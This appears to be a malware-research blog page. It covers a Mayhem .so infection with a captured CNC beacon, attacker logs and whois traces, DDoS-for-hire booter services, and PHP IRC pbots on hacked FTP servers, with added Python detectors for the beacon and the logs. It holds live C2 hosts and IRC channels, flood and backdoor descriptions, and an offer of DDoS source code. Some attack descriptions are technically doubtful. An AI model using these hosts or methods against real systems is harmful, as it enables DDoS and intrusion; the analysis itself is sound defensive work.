libworker1-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
libworker2-32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
libworker2-64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, stripped
$

// CNC:

POST /kuku/theend.php HTTP/1.0
Host: erstoryunics.us
Pragma: 1337
Content-Length: 84

R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,
HTTP/1.1 200 OK
Date: Tue, 10 Jun 2014 22:12:22 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 6
Connection: close
Content-Type: text/html; charset=UTF-8
R,200
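The beacon above has three traits worth matching on in web proxy or IDS logs: a POST to theend.php, the odd "Pragma: 1337" header, and a comma separated body that opens with an "R" record. As an added example (not code from the report), the Python below parses a raw HTTP request and reports which of those traits are present, and reads the "R,200" reply status back out of the response. The sample exchange is reconstructed from the capture quoted above (Content-Length is recomputed from the quoted body); treating the 8-digit second body field as a build date is my assumption, not something the report states.

```python
import re

# Reconstructed from the captured exchange in the report; Content-Length recomputed for the quoted body
BEACON_BODY = "R,20130826,64,0,,UNIX SCO System - MalwareMustDie Bangs Moronz CNC,"
SAMPLE_REQUEST = (
    "POST /kuku/theend.php HTTP/1.0\r\n"
    "Host: erstoryunics.us\r\n"
    "Pragma: 1337\r\n"
    "Content-Length: %d\r\n"
    "\r\n" % len(BEACON_BODY)
) + BEACON_BODY
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.15 (CentOS)\r\n"
    "Content-Length: 5\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "R,200"
)
# Constructed benign request for comparison
BENIGN_REQUEST = "GET /index.php HTTP/1.1\r\nHost: www.example.com\r\nPragma: no-cache\r\n\r\n"


def parse_http_message(raw):
    """Split a raw HTTP request or response into start line, lower-cased header dict and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0], "headers": headers, "body": body}


def mayhem_beacon_indicators(raw_request):
    """Return the names of the Mayhem beacon traits present in a request (empty list = none)."""
    msg = parse_http_message(raw_request)
    parts = msg["start"].split(" ")
    method, path = (parts[0], parts[1]) if len(parts) >= 2 else ("", "")
    found = []
    if msg["headers"].get("pragma") == "1337":
        found.append("pragma-1337")
    if method == "POST" and path.endswith("/theend.php"):
        found.append("post-theend.php")
    fields = msg["body"].split(",")
    # 'R' opcode followed by an 8-digit field (assumed to be a build date) and a numeric field
    if len(fields) >= 4 and fields[0] == "R" and re.fullmatch(r"\d{8}", fields[1]) \
            and fields[2].isdigit():
        found.append("R-record-body")
    return found


def beacon_reply_status(raw_response):
    """Pull the status out of an 'R,<code>' CNC reply body, or None if the body isn't one."""
    fields = parse_http_message(raw_response)["body"].strip().split(",")
    if len(fields) == 2 and fields[0] == "R" and fields[1].isdigit():
        return fields[1]
    return None


if __name__ == "__main__":
    print("beacon traits:", mayhem_beacon_indicators(SAMPLE_REQUEST))
    print("benign traits:", mayhem_beacon_indicators(BENIGN_REQUEST))
    print("CNC reply status:", beacon_reply_status(SAMPLE_RESPONSE))
```

Any single trait can occur in legitimate traffic (a site may well have a theend.php), so the useful alert condition is two or more of them on the same request; the Pragma value is the one least likely to appear by accident.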

// CNC INFO (NETWORK & GEOIP)

$ echo `dig +short erstoryunics.us`|bash origin.sh
Wed Jun 11 06:28:03 JST 2014|89.45.14.64||39743 | 89.45.14.0/24 | VOXILITY | MD | - | IM INTERNET MEDIA SRL
IP Address, City, Country Name, Latitude, longitude, Time Zone
89.45.14.64, , Romania, 46.0, 25.0, Europe/Bucharest

//-------------------------------------
// ATTACK TIME RANGE:
//-------------------------------------

First session: "[22/May/2014:13:01:08 +1000]"
2nd Session First: "[09/Jun/2014:07:50:46 +1000]" 
2nd Session Latest:"[10/Jun/2014:04:39:51 +1000]"

//-------------------------------------
// ATTACKER ACCESS POC & SOURCE IP POC:
//-------------------------------------

// Attacker access log aiming the PHP .SO Malware installer PHP script: 

103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
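The "ATTACK TIME RANGE" figures above are what you get by grouping the installer-script hits per source IP and taking the earliest and latest timestamps. As an added example (not code from the report), the Python below does that over Apache combined-format log lines: it parses each line, keeps only requests for the installer script paths seen in this report (cache.php, cache/cache.php, jquery.js.php), and reports per IP the hit count, first and last time, and how many requests carried no User-Agent. The sample log is the access log quoted above plus one constructed benign line; the installer path list is taken from this report and would need extending for other incidents.

```python
import re
from datetime import datetime

# Apache combined log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Installer script paths named in this report (extend per incident)
INSTALLER_PATHS = ("/cache.php", "/cache/cache.php", "/jquery.js.php")

# The access log lines quoted in the report, plus one constructed benign request (10.0.0.9)
SAMPLE_LOG = """\
103.31.186.33 - - [09/Jun/2014:07:50:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:03:34:23 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:10:30 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [10/Jun/2014:04:39:51 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:07:56:45 +1000] "GET /cache.php HTTP/1.0" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:19:50:28 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:21:39:46 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:22:10:14 +1000] "GET /cache.php HTTP/1.1" 200 71 "-" "-"
103.31.186.33 - - [08/Jun/2014:06:25:18 +1000] "GET /jquery.js.php HTTP/1.0" 200 71 "-" "-"
31.202.247.234 - - [22/May/2014:13:01:08 +1000] "GET /cache/cache.php HTTP/1.1" 200 17943 "-" "Mozilla/5.0 (Windows NT 6.1; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
10.0.0.9 - - [09/Jun/2014:08:00:00 +1000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict with a timezone-aware datetime, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = int(rec["size"]) if rec["size"].isdigit() else 0
    return rec


def installer_sessions(lines):
    """Group hits on the installer scripts by source IP: count, first/last time, blank-UA count."""
    sessions = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] not in INSTALLER_PATHS:
            continue
        s = sessions.setdefault(rec["ip"], {"count": 0, "first": None, "last": None,
                                            "blank_ua": 0, "paths": set()})
        s["count"] += 1
        s["first"] = rec["time"] if s["first"] is None else min(s["first"], rec["time"])
        s["last"] = rec["time"] if s["last"] is None else max(s["last"], rec["time"])
        if rec["ua"] == "-":
            s["blank_ua"] += 1
        s["paths"].add(rec["path"])
    return sessions


if __name__ == "__main__":
    for ip, s in sorted(installer_sessions(SAMPLE_LOG.splitlines()).items()):
        print("%-16s hits=%d first=%s last=%s blank_ua=%d paths=%s" % (
            ip, s["count"], s["first"].isoformat(), s["last"].isoformat(),
            s["blank_ua"], sorted(s["paths"])))
```

Run against a real log it answers the two questions an IR write-up needs: which sources touched the installer at all, and over what window; the blank User-Agent on every automated hit is a handy secondary filter for the scripted visits as opposed to the browser-driven first session.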


//-------------------------------------
 Tracing attacker source IP: "103.31.186.33 (ROMANIA)"
//-------------------------------------

$ whois 103.31.186.33
% [whois.apnic.net]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
 
% Information related to '103.31.186.0 - 103.31.186.127'
 
inetnum: 103.31.186.0 - 103.31.186.127
netname: Saulhost
descr: Saulhost Hosting
country: RO
admin-c: MT669-AP
tech-c: MT669-AP
status: ASSIGNED NON-PORTABLE
remarks: INFRA-AW
mnt-by: MAINT-HK-VOXILITY
mnt-lower: MAINT-HK-VOXILITY
mnt-routes: MAINT-HK-VOXILITY
mnt-irt: IRT-VOXILITY-AP
changed: noc@voxility.com 20130118
source: APNIC
 
irt: IRT-VOXILITY-AP
address: Dimitrie Pompeiu 9-9A
address: Building 24
address: Bucharest 020335
address: Romania
e-mail: noc@voxility.com
abuse-mailbox: noc@voxility.com
admin-c: VOX100
tech-c: VOX100
auth: # Filtered
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20121015
source: APNIC
 
person: Michael Ter-Sahakyan
address: Terbatas 14
address: LV-1011 Riga
address: Latvia
country: RO
phone: +37166163312
e-mail: abuses@saulhost.com
nic-hdl: MT669-AP
remarks: INFRA-AW
abuse-mailbox: abuses@saulhost.com
mnt-by: MAINT-HK-VOXILITY
changed: noc@voxility.com 20130118
source: APNIC

//-------------------------------------
 Tracing attacker source IP: "31.202.247.234 (UKRAINE)"
//-------------------------------------

 
$ whois 31.202.247.234
% This is the RIPE Database query service.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf
 
% Note: this output has been filtered.
% To receive output for a database update, use the "-B" flag.
 
% Information related to '31.202.192.0 - 31.202.255.255'
 
% Abuse contact for '31.202.192.0 - 31.202.255.255' is 'abuse@maxnet.ua'
 
inetnum: 31.202.192.0 - 31.202.255.255
netname: FORMAT-TV-NET-5
descr: MSP Format Ltd.
country: UA
admin-c: FA4288-RIPE
tech-c: FA4288-RIPE
status: ASSIGNED PA
mnt-by: FORMAT-TV-MNT
mnt-domains: FORMAT-TV-MNT
mnt-routes: FORMAT-TV-MNT
source: RIPE # Filtered
 
person: Format Admin
address: Ukraine Mariupol
phone: +380629422490
nic-hdl: FA4288-RIPE
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
 
% Information related to '31.202.247.0/24AS6712'
 
route: 31.202.247.0/24
descr: Leased line ISP Format
origin: AS6712
mnt-by: FORMAT-TV-MNT
source: RIPE # Filtered
CNC callback screenshot (the second take):

#MalwareMustDie!

Monday, June 9, 2014

DDoS'er as Service - a camouflage of legit stresser/booter/etc

The background

After visiting some hacked FTP sites, as reported in the previous posts [-1-] and [-2-], I figured out a connection: some of the IRC scripts running there lead to groups/individuals offering DDoS'er attack services. I personally found it interesting to check thoroughly and deeper into the source, so this weekend I made a visit to the DDoS'er as service sites, with some records of their malicious activities. The reason is simply investigation, to confirm some segments of IPs gathered in previous cases against these services. During the trip I made memos here and there, so this post gathers them all for easier searching. It is not about bragging anything to anyone, just a share.

DDoS as Service

DDoS and their services are not new stuff. These services cleverly hide their maliciousness under words like "for education" or "for testers" and so on, in their promotions or TOS statements on their public home pages, or in the descriptions of the demonstration videos they upload to video sites. However, if you look at some XXX and YYY communities where hackers gather, these services are campaigning in a very different tone: terms like "powerful", "hit", "takedown" and so on come to the surface, suggesting attack tools are being promoted. Further, we can see screenshots of "successful attacks" in real cases, openly shared to prove how "powerful" their services are. The videos posted here explain more than the words of the previous statements. So the market is there, with youngsters in the majority, and we can say it is a fruitful, steady income to catch, which explains the competitive promotion.

Among the tons of "DDoS'er As Service" spotted, the list below is some that I picked to study. I extracted their campaign details and information into the snapshots of campaign images and videos in the next section, some including a bit of commentary.

NetGuard
Big Bang Booter
Critical Stresser
Wrath Stresser
Apocalypse Stresser
Titanium Stresser

Collected Items

For MMD friends who like this kind of collection, I gathered some of the campaign materials they are using. Well, they really love a really long (literally, in size) promotion mentioning similar terms about pricing, duration of service and TOS. With one term that they all use in common: non-refundable payment :-)

In the short limited time I had, I managed to compile videos of these services containing the demonstrations (to be clear: these are what they provided, not me), which are a quite good reference for learning what these are actually about:



Some DDoS/Stresser/Booter terms to know..

During the investigation of these attacker services, I also learned the "trend" of recent terms used by these DDoS'ers, with the correct explanations collected below, which can be used as a quick reference for the attack methods, or for the scripts they use when checking infected sites with their front end tools. We mentioned the same explanations in a previous post investigating their attacker scripts, but these explanations are more accurate and are very good know-how to have:

1. UDP Flood

A DoS that floods the target with various combinations of UDP packets (UDP being a sessionless/connectionless networking protocol). This attack works effectively against home connections. UDP floods are amplified by a script (program) and can be amplified to over 20Gbps, practically making the target as good as offline.

2. Chargen

Chargen is another UDP-type flood attack, working most effectively against port 8080 for optimal results. This attack is generated by Chargen script logic (PHP/Perl/C) and can be amplified to over 20Gbps. The target is the Chargen (port 19) service, from which the name derives; it can be spoofed into sending data from one service on a computer to another service on another computer. This attack consumes an increasing amount of network bandwidth, causing loss of performance or a total shutdown of the affected network segments, and it can disable a Unix server by making it spend all of its time processing UDP packets that it has echoed back to itself.

3. UDPLag:

Just like a UDP flood, but this attack will not knock the target offline; instead it will make it lag.

4. ESSYN Flood

An amplified spoofed SYN attack that abuses the TCP 3-way handshake by never responding to the target's TCP confirmation response, making it wait indefinitely for the handshake to complete.

5. Slowloris

An extremely effective attack method against webservers running Apache, Tomcat and GoAhead. It keeps as many connections open for as long as possible by only sending partial requests, thus blocking access to the server for other clients.

6. Rudy (R U Dead Yet)

By sending small packets of 1 byte through an HTTP POST request it forces the connection with the server to stay open. RUDY is harder to detect and prevent.

7. ARME

ARME is considered a layer 4 attack method. It is quite strong because it eats up all of the swap memory of a server running Apache, eventually flooding the HDD, leaving the server out of operation and its services shut down.

8. Resolver

This is not an attack technique but a common function of the DDoS'er tools on the market nowadays: resolving (8.1.) the real IP address of a host protected behind the Cloudflare service, and (8.2.) the real IP address of Skype users, in order to perform the above attacks.

DDoS Source Code (L7+L4) & Amplification IP list

Along with the investigation we collected and secured the recent source code that has been used for DDoS activities, together with its companion amplification IP address list, and also grabbed some know-how that has been shared in the xxx lair by the skids and hackers. Below is a video of what is shared; check it first to make sure whether you need it or not:

The download for the package (5.32 MB) is here-->>[Secure Code: 777022].
You will need the password for the archive, so please leave a comment at the bottom of this post for the request, explaining a bit about who you are, why you need the source code, and where we can contact you (no comment will be published).
The purpose of sharing is to raise the scan detection ratio for these codes/scripts/binaries, forwarding the knowledge used by attackers to the DDoS prevention entities; it is a share to the security community who is fighting this threat. We don't take any responsibility for misuse of the shared material passed to unknown third parties.

Epilogue

In the end, this information hopefully explains how DDoS is served and how DDoS is always in operation, and how some of these services are wrapped in a simple GUI to be used for attacks. Suspending domains or mitigating DDoS services like these does not have much effect; we need firmer action to stop the individuals and the infrastructure used to perform it. They use common domains, web sites, even YouTube for promotion; moreover some of them use a known DDoS protection service to guard their DDoS'er sites (see picture below). It has just gone too far, and maybe now is the right time to say "STOP".

But stopping these is easier said than done. I was thinking that maybe we need to push this awareness further, to raise the importance of making a smoother scheme to fight this threat, hoping this post and other similar previous posts by others on this issue can escalate the process.

Kudos to twitter friends with great comments!

Thanks to DOMAIN.ME & PW Registry for the instant suspensions. Thank you so much to these cool IT guys: @cesi0_ @DarkSunsetSX @NotBluntMan @BugTracK @LibidinousPrick @jedisct1 @VriesHD @whalezeye and all friends who favorited and RT'd, for the great support & comments during the trip (see below). And to the MMD team: @essachin @malm0u53 @wirehack7 @MichalKoczwara for the support & for the tango help!

Stay safe folks! #MalwareMustDie!

Monday, June 2, 2014

A journey to abused FTP sites (story of: Shells, Malware, Bots, DDoS & Spam) - Part 2

This writing is dedicated to fellow sysadmins all over the networks of this globe, who work hard keeping internet services running smoothly and help to clean up the bad stuff. You rock! Respect! This is the second part of the previously posted analysis here-->>[Part 1]

Observation

In this part I will discuss the hacked FTP sites reported as per the snapshots below; I will call them Case 4, 5, 6 and 7 (bonus case), and NEW! Case 8 (additional).


Case #4: IRC Bot PHP Pbot(s) - The evolution begins..

As explained in the first part, there were some IRC bots detected in the abused FTP sites reported, one of them called pbot(s), and in this part we will explain how the IRC Bot PHP Pbot evolved. In all of the cases 4, 5, 6 and 7 there are pbots found. I guess the IDS scanner can detect some significant strings to filter the contents of these bots' code, good job!

I wrote about the pbot we cracked in these links: [1] and [2], with or without encoding or obfuscation in its code. I think those cases were spotted around 2012 and January 2013. Back then the pbot had very limited "weapon" functions for attacking, which were:

- TCP Flood
- UDP Flood
- Port Scanning
Yes, that's it for the aggressive attacks they had; TCP Flood and UDP Flood were the only DoS schemes back then. There are some IRC and networking related functions like "backconnect" to poke the master in some #hacker-paradise ircd waiting for the compromised sites to pop up in their channels, and other IRC communication commands for the operational purposes of the bot.

Now let's take a peek at Case #4: in each directory "a/" or "b/" injected into the root directory of this FTP service you can find a script called li.php, and these files look like they were last updated on June 1 and May 31, 2014.

This "version" of pbot has an improvement in the UDP Flood attack function, as per the code below, which supports multiple scanning:

..and also a downgrade of the TCP Flood function into a TCP Connect function:

The operation method used as a "bot" focuses on Windows shell command execution through multiple methods, with an additional option for execution via Perl. Below are the snippets of the methods used to execute a Windows shell:

..and this is how Perl is used to perform shell execution:

The shell execution methods above are then linked to the PHP "evil" functions used by this pbot for further operations:

The IRC connection method is similar to the previous version, a classic method used by some other bots too, with an array as per below containing the IRC server IP, port number, password, channel and host auth, plus additional components used to form a specific format of NICK and USER (using $ident):

By simulating the above information, forming a fake NICK using the stated logic and then forming the USER name as below, we can start to pretend to be a bot connecting to their IRC server:

A simple test like the one below confirms the actor's server status:

It seems the China network is being abused as the IRC CNC for this case's attacker:

Check Date: Tue Jun  3 01:21:20 JST 2014
IP: 222.216.30.28
ASN: 4134
Network Prefix: 222.216.0.0/15
AS Name: CHINANET
Country: CN
ISP: CHINATELECOM.COM.CN
Company: CHINANET GUANGXI PROVINCE NETWORK

There are other very generic functions commonly used in IRC bots, like making PING PONG pokes, sending email using the PHP mail function, getting the system environment via PHP uname, downloading stuff to the compromised server using the safe area in /tmp, etc., which I won't explain here since you'll see them in the shared samples too, as very self-explanatory code.

The sample in VT is here-->>[VT]
Let's move on to the next cases...

Case #5: A bummer pbot (no comment)

In this case we are dealing with a file named bot.php. Well.. wow.. it must be a crook with very high self-confidence, or a very stupid one, or a greenhorn skid, to hack an FTP server and upload such a straightforward file name. Protip: if you find this kind of file on the servers you watch, just delete it without asking, or send it to VirusTotal first and then delete it, OK? :-) Don't worry, it must be bad, either the file or the person who named it that way.

OK, bot.php is also a pbot of the same version as discussed in Case #4. The differences from the previous case are the IRC connection (pic below) and the way it slices the packet size for the UDP Flood:

A test drive...

13:12 -!- Irssi: Looking up 120.43.64.62
13:12 -!- Irssi: Connecting to 120.43.64.62 [120.43.64.62] port 10000
13:12 -!- Irssi: Unable to connect server 120.43.64.62 port 10000 [Connection refused]
oh mai...what a bummer..

The sample in VT is here-->>[VT]
OK, let's move on!

Case #6 & #7: BTC miners & PWS PE payloads + Behold.. New fully weaponized Pbots..

This is the case where I found the Cloudflare DDoS mitigation code, as I tweeted below:

Yes, I found the function in the Pbot code, dated at the earliest from March 28th and 30th, 2014.

These two FTP cases are so identical in their injected payloads that it suggests the same actors are behind both compromised FTP incidents; we'll see it later..
Both sites' root directories are filled with the WinPE binaries shown in the screenshots in the Observation part above. Later on we learned those are Bitcoin Miners & PWS, old stuff mostly made in VB or .NET, known malware with good detection rates. You can get the samples and feel free to analyze them yourself, but I must skip their analysis for not having much time to write.

And the "pub/" directories of both sites are filled with bots; just like the WinPE in the root directories, the pattern of both sites is the same, as shown below:

What I marked in yellow are the pbot(s) of the version discussed in Case #4, and it looks like we have an evolution in version, which I marked in red. The rest of the files will be explained separately.

Since we know the characteristics of pbot from peeking closely at its code, we can quickly analyze the attacker's source in mass-injected files like these with a simple grep command, going straight to the source; in my case I grep for the string below:

array("server"=>"
And get these answers for the "not so new" pbots:

Extracting the IRC servers used as CNC and their channels gives:
89.248.171.42 "chan"=>"#rhd" 
89.248.171.43 "chan"=>"#rhd" 
89.248.171.44 "chan"=>"#rhd" 
89.248.171.45 "chan"=>"#rhd" 
93.174.88.124 "chan"=>"#Xtreme"
94.102.63.134 "chan"=>"#Xtreme"
94.102.63.135 "chan"=>"#Xtreme"
94.102.63.136 "chan"=>"#Xtreme"
94.102.63.137 "chan"=>"#Xtreme"
And for the new/latest pbot I extracted the data below:
124.php(3):    "server" => "93.174.88.124", "chan"=>"#lsass"
newbot.php(3): "server" => "89.248.171.54", "chan"=>"#lsass"
15.php(11):    "server" => "89.248.171.54", "chan"=>"#news"
bot15.php(11): "server" => "89.248.171.54", "chan"=>"#news"
So we have 4 channels on 10 IRC servers herding these pbots in the two FTP cases and, shortly speaking, most of the IRC servers and channels are up and alive (checked, and doing some investigation now..)

The ECATEL, Netherlands network in ASN 29073, networks 89.248.170.0/23 and 94.102.48.0/20, is being thoroughly abused by these attackers as the IRC CNC network for these bots:

89.248.171.42|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.43|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.44|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.45|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.54|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
93.174.88.124|hosted-by.ecatel.net.|29073 | 93.174.88.0/21 | ECATEL | NL | WEBHOST.COM.AU | DEDICATED SERVERS
94.102.63.134||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.135||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.136||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.137||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD

On June 3rd, 2014, some of the previous-version pbots (which only had udp/tcp attacks) were upgraded into the fully weaponized version (with multiple L7 DDoS attack functions). There is no new IP for the IRCd (CNC) used, but now we know precisely the meaning of the filename: it is the last octet of the IP address being used as CNC. This is a PoC that these crooks are really using the network segment described in the list above and utilizing it for the attack; no one would name an attack bot 42, 43, 44, 45, matching the IP addresses used, unless they own that network. "Owning" may mean by hack, or.. more likely by rent. Below is my tweet answering Mr. Rik van Duijn's question about this matter, with the sample share:
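The grep above and the filename-equals-last-octet observation can be turned into a small triage helper. The script below is an added example (not MMD's code): it pulls server/port/channel out of pbot-style config arrays, tolerates the spaced `"server" => ` layout of the newer variant, and flags files whose name is the C2 IP's last octet; the PHP snippets are constructed to mimic the layouts quoted in this post.

```python
"""Triage helper for pbot-style PHP IRC bots (added example, not the post's code)."""
import re
from collections import defaultdict

# Keys pbot keeps in its IRC config array; the regex tolerates "key"=>"v",
# "key" => "v" and unquoted numbers such as "port"=>6667.
KEYS = ("server", "port", "chan", "pass", "hostauth")
PAIR_RE = re.compile(r'"(%s)"\s*=>\s*"?([^",\s)]*)"?' % "|".join(KEYS))


def extract_pbot_config(php_source):
    """Return {key: value} for the IRC settings of the first array holding a
    "server" key, or None when the file carries no such array."""
    hit = re.search(r'"server"\s*=>', php_source)
    if not hit:
        return None
    start = php_source[:hit.start()].rfind("array")   # enclosing array(...)
    end = php_source.find(";", hit.end())              # statement terminator
    body = php_source[start if start >= 0 else hit.start():end if end >= 0 else None]
    return dict(PAIR_RE.findall(body))


def filename_matches_last_octet(filename, server_ip):
    """True when the bot file is named after the C2 IP's last octet
    (e.g. 42.php pointing at 89.248.171.42), the habit the post describes."""
    stem = filename.rsplit("/", 1)[-1].split(".", 1)[0]
    return stem.isdigit() and stem == server_ip.rsplit(".", 1)[-1]


def triage(files):
    """files: {path: php_source}. Returns rows
    (server, port, chan, path, octet_match) sorted by path; non-pbot
    files (downloaders, helpers) are skipped."""
    rows = []
    for path, src in sorted(files.items()):
        cfg = extract_pbot_config(src)
        if cfg is None:
            continue
        server = cfg.get("server", "")
        rows.append((server, cfg.get("port", ""), cfg.get("chan", ""),
                     path, filename_matches_last_octet(path, server)))
    return rows


def channels_by_server(rows):
    """Group channels per C2 server: the 'N channels on M servers' tally."""
    seen = defaultdict(set)
    for server, _port, chan, _path, _match in rows:
        seen[server].add(chan)
    return {s: sorted(c) for s, c in seen.items()}


# Constructed sample files, modelled on the config layouts quoted in the post.
SAMPLE_FILES = {
    "pub/42.php": ('<?php\nset_time_limit(0);\n$config = array("server"=>"89.248.171.42", '
                   '"port"=>6667, "pass"=>"", "prefix"=>"[x]", "chan"=>"#rhd", '
                   '"hostauth"=>"*");\n'),
    "pub/124.php": ('<?php\n$config = array(\n  "server" => "93.174.88.124",\n'
                    '  "port" => "6667",\n  "chan"=>"#lsass",\n  "pass"=>"");\n'),
    "pub/newbot.php": ('<?php\n$config = array("server" => "89.248.171.54", '
                       '"port" => 6667, "chan"=>"#lsass");\n'),
    "pub/win.php": '<?php\n// downloader helper, no IRC config\n$u = "http://example.invalid/a.exe";\n',
}

if __name__ == "__main__":
    result = triage(SAMPLE_FILES)
    for server, port, chan, path, match in result:
        print(f"{path:16} -> {server}:{port} {chan:8} name=last-octet: {match}")
    print(channels_by_server(result))
```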


Samples are in VirusTotal ;-)) here --> [-1-] [-2-] [-3-] [-4-] [-5-] [-6-]

Well, we know the attacker's source. Now what is inside the recent version of pbot, and how does it differ from the previous version? Below is the explanation with screenshots:

Basic function improved

The way the channel and connection are used is very specific:

This pbot version has a set of User-Agents for HTTP purposes (DDoS), as listed below:

In this version, GeoIP codes are used when forming the NICK:

There are some messages in Portuguese, suggesting the coder is from a country speaking that language.

..and a lot of other new bot functions which improve on the previous version quite a bit; you can see them in the source code that will be shared later on.

Heavily armed and dangerous..

For attack functionality, this recent new pbot version has:

- udpflood
- httpflood (NEW!)
- synflood (IMPROVED!)
- slowlorrisflood (NEW!)
- rudyflood (NEW!)
- armeflood (NEW!)
- cloudflareflood (NEW!)
- tcpflood (IMPROVED)
- Data Cha0s Connect Back Backdoor (NEW)
I will snippet the NEW! attack function source code for mitigation purposes, with a quick explanation.

httpflood ; OK, at least now we know how the User-Agent list is used :-)

synflood ; I personally don't think a SYN attack is new, but it is new in a pbot (at least for me), so here are the snips:

tcpflood ; Well.. this attack is not a dummy attack anymore.. Finally they figured out a way to code this section :)

slowlorrisflood ; This is a DDoS method that sends packets without haste, flooding by using GET or POST. The logic is very interesting, as detailed below; the DDoS guard industry should review this code and start mitigating this logic. Ref-->[link]

armeflood ; This attack focuses on flooding the victim with HEAD requests:

rudyflood ; I have no idea why this was named "rudy" :-) But it floods victims with randomized packet sizes, and toying with the combination of request Content-Length looks like the main way it DoSes the victim's server:

cloudflareflood ; This is as it sounds, a nasty piece of code meant to evade Cloudflare. I tweeted this, mentioning Cloudflare, so they can mitigate it as soon as possible. Below is the attack logic:

The CURL command used in the above functions is actually a homemade function:

"Data Cha0s Connect Back Backdoor" ; Wow..what a name! :D This evil code is actually hidden in the conback($ip, $port) function here:

The logic simply decodes the base64 blob, saves it into a .pl file, and executes it with perl. What is decoded is actually a SHELL written in Perl:

I think that's it for the recent Pbot. For mitigation purposes, please study the full code, which can be seen in the samples (shared with the security community only).
The VirusTotal detection results for each sample spotted are as follows: [-1-] [-2-] [-3-] [-4-]

The last mystery to solve is HOW the WinPE binaries got into the root of this FTP server. It is answered by the rest of the scripts located in "/pub", which are win.php, test.php and wink.php. These scripts look like helpers of the pbot, executed to download the other files as commanded by the bot herder. Well, the code says a thousand words, please see the snippets below:

You can see the multiple methods used to download those binaries. Mystery solved :-)

Conclusion, infected IP, VT and samples

So now we see how much we can get by investigating only several URLs. Every alert is worth investigating as deeply as this (or, I may say, I expect deeper, since I do this only after my day job). You will never know what you will find unless you dive into it. Thanks again to "Yin" for allowing me to write this to raise awareness.

The PHP IRC pbot itself has evolved into a dangerous threat since we first covered it 2 years ago. However its nature is the same: using PHP ..yet using Perl also, the way it connects to the channel, and so on.. So it is very good to know each bot's characteristics.
Pbot is now weaponized with many L7 DDoS attack patterns.

